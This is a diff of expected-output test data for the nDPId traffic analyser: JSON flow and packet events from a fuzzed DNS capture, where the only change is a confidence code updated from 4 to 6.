00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1120470419648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470419648,"pkt":"ADBUADRWAODtAW69CABFAABIa00AAIARJXMAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1120470423654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470423654,"pkt":"ADBUADRWAODtAW69CABFAABIa04AAIARTAPAqAECwKgBAQrfADUANOABSeQBAAIBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1120470431656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470431656,"pkt":"ADBUADRWAODtAW69CABFAABEa08AAIARTAbAqAECwKgBAQrgADUAMIb5neUAAAABAAAAAAAAATEBMAEwJXMANwdpbi1hZGRyqqqqqqqqqqqqqg=="} 
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":14087,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431656,"flow_last_seen":1120470431656,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2784,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":14087,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1120470431657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470431657,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgFAgA1CuAAR2l1neWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFzcGEAAAwAAcAMAAwAAQAAJyVzAAlsb2NhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18688,"global_ts_msec":1120470439142} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18688,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470431658,"pkt":"ADBUADRWAODtAW69SQBFAIBIa1EAAIARTADAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1120470440137,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470440137,"pkt":"ADBUADRWAODtAW69CABFAABIa1LfAEwlcwDAqAECwKgBAQrhADUANAD+KOYBAAABAAAAQAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470440137,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -765,33 +765,33 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1120470442140,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":28,"thread_ts_msec":1120470442140,"pkt":"ADBUADRWAODtAW69CABFAAAwa1MAAIATS\/7AqAECwKgBAQrhADUANAD+KOYBAAABAAAAAEsABF9zaXAEX3VkcANzaXB3Y3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1120470444143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470444143,"pkt":"ADBUADRWAODtAW69CABFAABIa1QAAIARS\/3IqAECwKgBAQrhADUANAD+KOYBIAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAEk="} 
-00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470444143,"flow_last_seen":1120470444143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470444143,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470447197,"flow_last_seen":1120470447197,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470447197,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":35721,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1120470447197,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470447197,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa1YAAIARSvfAqAECwKgB\/wCJi4kAOltphTIBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ3hDQSlNAAAgAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1120470448149,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470448149,"pkt":"ADBUADRWAODtAW69CABFAABIa1gAAIARS\/nAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXZjaXR5AmRrAAAhlAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470448149,"flow_last_seen":1120470448149,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470448149,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybevcity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 